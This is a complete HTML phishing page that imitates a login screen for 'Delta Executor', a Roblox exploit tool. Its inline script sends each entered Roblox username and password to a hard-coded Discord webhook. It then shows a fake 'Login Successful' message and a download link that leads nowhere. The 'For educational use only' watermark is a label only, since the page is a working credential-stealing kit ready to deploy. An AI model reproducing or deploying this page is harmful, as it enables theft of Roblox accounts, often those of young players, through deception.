<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Delta Executor - Roblox</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <div class="login-box">
    <img src="assets/delta-logo.png" class="logo" alt="Delta Logo">
    <h2>Login to Delta Executor</h2>
    <form id="loginForm">
      <input type="text" id="username" placeholder="Roblox Username" required><br>
      <input type="password" id="password" placeholder="Account Password" required><br>
      <button type="submit">Login</button>
    </form>
    <div id="download" style="display:none;">
      <p>✅ Login Successful.</p>
      <a href="#">Download Delta Executor</a>
    </div>
  </div>
  <p class="watermark">For educational use only</p>

  <script>
    const webhookURL = "https://discord.com/api/webhooks/1396797120983466044/6YdZO0lCdFr9DOXIBS3iEv1G2Xw9FLyj20nEwx4nfOP172TVk-DgYTPEKIWf8RrYtbzG";

    document.getElementById("loginForm").addEventListener("submit", function(e) {
      e.preventDefault();
      const username = document.getElementById("username").value;
      const password = document.getElementById("password").value;

      const content = {
        content: `📥 **Login Baru Delta Palsu**\n👤 Username: ${username}\n🔑 Password: ${password}`
      };

      fetch(webhookURL, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(content)
      }).then(res => {
        if (res.ok) {
          document.getElementById("loginForm").style.display = "none";
          document.getElementById("download").style.display = "block";
        } else {
          alert("Login gagal. Sila cuba lagi.");
        }
      });
    });
  </script>
</body>
</html>
